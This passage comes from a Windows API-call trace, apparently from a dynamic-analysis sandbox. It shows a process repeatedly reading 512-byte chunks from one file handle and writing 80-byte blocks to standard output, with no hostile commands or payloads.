dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.844] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.844] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.844] GetFileType (hFile=0x50) returned 0x1 [0149.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.844] GetFileType (hFile=0x50) returned 0x1 [0149.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.844] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.845] GetFileType (hFile=0x50) returned 0x1 [0149.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.845] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.845] GetFileType (hFile=0x50) returned 0x1 [0149.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.845] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.845] GetFileType (hFile=0x50) returned 0x1 [0149.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.845] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.845] GetFileType (hFile=0x50) returned 0x1 [0149.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.845] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.845] GetFileType (hFile=0x50) returned 0x1 [0149.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.845] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.845] GetFileType (hFile=0x50) returned 0x1 [0149.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.845] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.845] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.845] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.845] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.845] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.845] GetFileType (hFile=0x50) returned 0x1 [0149.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.846] GetFileType (hFile=0x50) returned 0x1 [0149.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.846] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.846] GetFileType (hFile=0x50) returned 0x1 [0149.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.846] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.846] GetFileType (hFile=0x50) returned 0x1 [0149.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.846] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.846] GetFileType (hFile=0x50) returned 0x1 [0149.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.846] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.846] GetFileType (hFile=0x50) returned 0x1 [0149.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.846] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.846] GetFileType (hFile=0x50) returned 0x1 [0149.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.846] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.846] GetFileType (hFile=0x50) returned 0x1 [0149.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.846] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.846] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.846] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.846] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.846] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.846] GetFileType (hFile=0x50) returned 0x1 [0149.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.847] GetFileType (hFile=0x50) returned 0x1 [0149.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.847] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.847] GetFileType (hFile=0x50) returned 0x1 [0149.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.847] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.847] GetFileType (hFile=0x50) returned 0x1 [0149.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.847] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.847] GetFileType (hFile=0x50) returned 0x1 [0149.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.847] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.847] GetFileType (hFile=0x50) returned 0x1 [0149.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.847] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.847] GetFileType (hFile=0x50) returned 0x1 [0149.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.847] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.847] GetFileType (hFile=0x50) returned 0x1 [0149.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.847] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.847] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.847] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.847] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.847] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.848] GetFileType (hFile=0x50) returned 0x1 [0149.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.848] GetFileType (hFile=0x50) returned 0x1 [0149.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.848] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.848] GetFileType (hFile=0x50) returned 0x1 [0149.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.848] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.848] GetFileType (hFile=0x50) returned 0x1 [0149.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.848] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.848] GetFileType (hFile=0x50) returned 0x1 [0149.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.848] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.848] GetFileType (hFile=0x50) returned 0x1 [0149.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.848] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.848] GetFileType (hFile=0x50) returned 0x1 [0149.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.848] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.848] GetFileType (hFile=0x50) returned 0x1 [0149.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.848] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.848] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.848] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.848] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.848] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.849] GetFileType (hFile=0x50) returned 0x1 [0149.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.849] GetFileType (hFile=0x50) returned 0x1 [0149.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.849] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.849] GetFileType (hFile=0x50) returned 0x1 [0149.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.849] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.849] GetFileType (hFile=0x50) returned 0x1 [0149.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.849] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.849] GetFileType (hFile=0x50) returned 0x1 [0149.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.849] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.849] GetFileType (hFile=0x50) returned 0x1 [0149.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.849] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.849] GetFileType (hFile=0x50) returned 0x1 [0149.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.849] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.849] GetFileType (hFile=0x50) returned 0x1 [0149.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.849] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.849] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.849] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.849] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.849] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.850] GetFileType (hFile=0x50) returned 0x1 [0149.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.850] GetFileType (hFile=0x50) returned 0x1 [0149.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.850] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.850] GetFileType (hFile=0x50) returned 0x1 [0149.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.850] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.850] GetFileType (hFile=0x50) returned 0x1 [0149.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.850] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.850] GetFileType (hFile=0x50) returned 0x1 [0149.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.850] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.850] GetFileType (hFile=0x50) returned 0x1 [0149.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.850] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.850] GetFileType (hFile=0x50) returned 0x1 [0149.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.850] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.850] GetFileType (hFile=0x50) returned 0x1 [0149.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.850] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.850] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.850] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.850] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.850] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.851] GetFileType (hFile=0x50) returned 0x1 [0149.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.851] GetFileType (hFile=0x50) returned 0x1 [0149.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.851] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.851] GetFileType (hFile=0x50) returned 0x1 [0149.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.851] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.851] GetFileType (hFile=0x50) returned 0x1 [0149.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.851] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.851] GetFileType (hFile=0x50) returned 0x1 [0149.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.851] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.851] GetFileType (hFile=0x50) returned 0x1 [0149.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.851] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.851] GetFileType (hFile=0x50) returned 0x1 [0149.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.851] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.851] GetFileType (hFile=0x50) returned 0x1 [0149.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.851] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.851] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.851] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.851] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.851] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.852] GetFileType (hFile=0x50) returned 0x1 [0149.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.852] GetFileType (hFile=0x50) returned 0x1 [0149.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.852] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.852] GetFileType (hFile=0x50) returned 0x1 [0149.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.852] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.852] _get_osfhandle 